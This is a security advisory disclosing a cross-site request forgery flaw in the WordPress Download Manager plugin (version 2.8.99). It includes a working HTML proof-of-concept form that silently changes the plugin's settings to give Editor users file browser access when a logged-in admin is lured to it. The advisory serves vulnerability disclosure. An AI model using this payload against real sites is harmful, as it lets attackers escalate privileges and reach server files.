Advisory

Burak Kelebek, July 2016

Cross-Site Request Forgery in WordPress Download Manager Plugin

Abstract

A Cross-Site Request Forgery vulnerability has been found in the WordPress Download Manager Plugin. By using this vulnerability an attacker can change confidential settings of the plugin.

OVE ID

OVE-20160722-0005

Tested versions

This issue was successfully tested on WordPress Download Manager version 2.8.99.

Fix

There is currently no fix available.

Introduction

WordPress Download Manager is a Files / Documents Management Plugin and Complete e-Commerce Solution for selling digital products. WordPress Download Manager plugin will help you to manage, track, control file downloads & sell digital products easily from your WordPress site. Use Password Protection, User Roles Protection to control access to your files. And simply setup prices when you need to sell the digital item. User can directly download free items and when item has a price user will have to go through cart & checkout. It has easiest checkout option to give the user better experience in purchasing an item and which always increase the probability of successful completion of an order. As rather than trying to convince customer to buy something, it would be more helpful to think of a cart optimization as an action to remove barrier to that goal.

It was discovered that WordPress Download Manager is vulnerable to Cross-Site Request Forgery.

Details

The Download Manager plugin lacks a CSRF (nonce) token on the request of saving settings. Because of this an attacker is able to change confidential settings like file browser access and browser base dir by luring a logged-in admin to follow a malicious link containing the proof of concept below.

Proof of concept

The proof of concept below gives file browser access to a user with Editor privileges:
<html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="task" value="wdm_save_settings"/>
         <input type="hidden" name="action" value="wdm_settings"/>
         <input type="hidden" name="section" value="basic"/>
         <input type="hidden" name="wpdm_permission_msg" value="Access Denied"/>
         <input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a>&#10;"/>
         <input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/>
         <input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/>
         <input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/>
         <input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
         <input type="hidden" name="__wpdm_download_speed" value="4096"/>
         <input type="hidden" name="__wpdm_download_resume" value="1"/>
         <input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
         <input type="hidden" name="__wpdm_open_in_browser" value="0"/>
         <input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
         <input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
         <input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
         <input type="hidden" name="__wpdm_login_url" value=""/>
         <input type="hidden" name="__wpdm_register_url" value=""/>
         <input type="hidden" name="__wpdm_user_dashboard" value=""/>
         <input type="submit"/>
      </form>
   </body>
</html>

Work with us →